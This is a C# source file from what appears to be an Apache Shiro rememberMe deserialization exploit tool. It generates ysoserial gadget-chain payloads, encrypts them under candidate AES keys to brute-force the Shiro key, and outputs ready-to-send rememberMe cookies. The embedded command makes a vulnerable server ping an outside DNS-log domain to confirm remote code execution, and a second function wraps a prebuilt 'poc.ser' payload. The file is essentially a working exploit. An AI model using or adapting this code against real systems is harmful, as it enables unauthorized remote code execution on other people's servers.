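/// <summary>
/// Builds a Shiro <c>rememberMe</c> cookie value carrying a ysoserial gadget chain whose command is
/// <c>ping {moduleKey}.{keyKey}.{dnslogDomain}</c>, so a vulnerable host reveals the working
/// key/gadget pair through a DNS lookup against the DNS-log domain.
/// </summary>
/// <param name="keyValue">Base64-encoded Shiro AES key candidate used to encrypt the payload.</param>
/// <param name="keyKey">Short label identifying <paramref name="keyValue"/>; becomes a DNS label in the callback name.</param>
/// <param name="moduleValue">ysoserial gadget name (e.g. <c>CommonsCollections2</c>); also names the <c>.ser</c> file written to the working directory.</param>
/// <param name="moduleKey">Short label identifying the gadget; becomes a DNS label in the callback name.</param>
/// <param name="dnslogDomain">DNS-log domain under which the callback is observed.</param>
/// <returns><c>"rememberMe=" + base64(encrypt(payload))</c>, ready to be sent as a cookie value.</returns>
/// <exception cref="ArgumentException">An argument is empty or contains a character outside <c>[A-Za-z0-9._-]</c>.</exception>
/// <exception cref="InvalidOperationException">ysoserial exited non-zero or produced no output.</exception>
public static string get_rememberMe(string keyValue, string keyKey, string moduleValue, string moduleKey, string dnslogDomain)
{
    // Every one of these ends up on a command line (and in a DNS name), so refuse anything that is
    // not a plain identifier / host-name character. That rules out quotes and shell metacharacters
    // up front instead of relying on escaping.
    RequireSafeToken(keyKey, nameof(keyKey));
    RequireSafeToken(moduleValue, nameof(moduleValue));
    RequireSafeToken(moduleKey, nameof(moduleKey));
    RequireSafeToken(dnslogDomain, nameof(dnslogDomain));

    // One .ser file per gadget: the original design runs one thread per gadget and names the file
    // after it so concurrent threads do not clobber each other's output.
    string serFile = $@"{moduleValue}.ser";
    byte[] payload = RunYsoserial(moduleValue, $"ping {moduleKey}.{keyKey}.{dnslogDomain}", serFile);

    // Shiro's AesCipherService needs no extra configuration here (the original author notes the
    // default is AES/128/CBC); only the key changes between calls, so the caller can brute-force
    // keys by calling this repeatedly.
    AesCipherService aesCipherService = new AesCipherService();
    byte[] keyB = Convert.FromBase64String(keyValue);
    byte[] encrptByte = aesCipherService.encrypt(payload, keyB).getBytes();
    return "rememberMe=" + Convert.ToBase64String(encrptByte);
}

// Accepts only ASCII letters, digits, '.', '_' and '-'; anything else is rejected before it can
// reach a command line or a DNS label.
private static void RequireSafeToken(string value, string paramName)
{
    if (string.IsNullOrEmpty(value))
    {
        throw new ArgumentException("value must not be empty", paramName);
    }

    foreach (char c in value)
    {
        bool ok = (c >= 'a' && c <= 'z') || (c >= 'A' && c <= 'Z') || (c >= '0' && c <= '9')
                  || c == '.' || c == '_' || c == '-';
        if (!ok)
        {
            throw new ArgumentException($"unsafe character '{c}' in {paramName}", paramName);
        }
    }
}

// Runs `java -jar ysoserial.jar <gadget> "<command>"` directly — no cmd.exe, so nothing in the
// arguments is interpreted by a shell — writes the serialized object to serFile and returns it.
// The gadget bytes are read straight from the child's stdout pipe; stderr is drained concurrently
// so a chatty ysoserial cannot fill its pipe and deadlock this process, and the child is awaited
// before its exit code is inspected.
private static byte[] RunYsoserial(string gadget, string command, string serFile)
{
    using (Process p = new Process())
    {
        p.StartInfo.FileName = "java";
        p.StartInfo.Arguments = $"-jar ysoserial.jar {gadget} \"{command}\"";
        p.StartInfo.UseShellExecute = false;
        p.StartInfo.RedirectStandardOutput = true;
        p.StartInfo.RedirectStandardError = true;
        p.StartInfo.CreateNoWindow = true;
        p.Start();

        var stderr = p.StandardError.ReadToEndAsync();
        byte[] payload;
        using (var buffer = new MemoryStream())
        {
            // Binary output: bypass the StreamReader (which would decode text) and copy raw bytes.
            p.StandardOutput.BaseStream.CopyTo(buffer);
            payload = buffer.ToArray();
        }
        p.WaitForExit();

        if (p.ExitCode != 0 || payload.Length == 0)
        {
            throw new InvalidOperationException(
                $"ysoserial failed for gadget {gadget} (exit code {p.ExitCode}): {stderr.Result}");
        }

        // Keep the on-disk copy the original produced, so anything else that looks for
        // "<gadget>.ser" in the working directory still finds it.
        File.WriteAllBytes(serFile, payload);
        return payload;
    }
}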
/// <summary>
/// Wraps the pre-built serialized object stored in <c>poc.ser</c> (working directory) in a Shiro
/// <c>rememberMe</c> cookie value, encrypted under the supplied AES key.
/// </summary>
/// <param name="keyS">Base64-encoded Shiro AES key.</param>
/// <returns><c>"rememberMe="</c> followed by the base64 of the encrypted payload.</returns>
/// <exception cref="FormatException"><paramref name="keyS"/> is not valid base64.</exception>
public static string getRememberMe(string keyS)
{
    // poc.ser must already exist in the working directory; it is consumed as raw bytes.
    byte[] serialized = File.ReadAllBytes("poc.ser");

    // Default Shiro cipher service — the original author notes no configuration is needed
    // (default AES/128/CBC); only the key varies between calls.
    var cipher = new AesCipherService();
    byte[] rawKey = Convert.FromBase64String(keyS);

    byte[] cipherText = cipher.encrypt(serialized, rawKey).getBytes();
    return string.Concat("rememberMe=", Convert.ToBase64String(cipherText));
}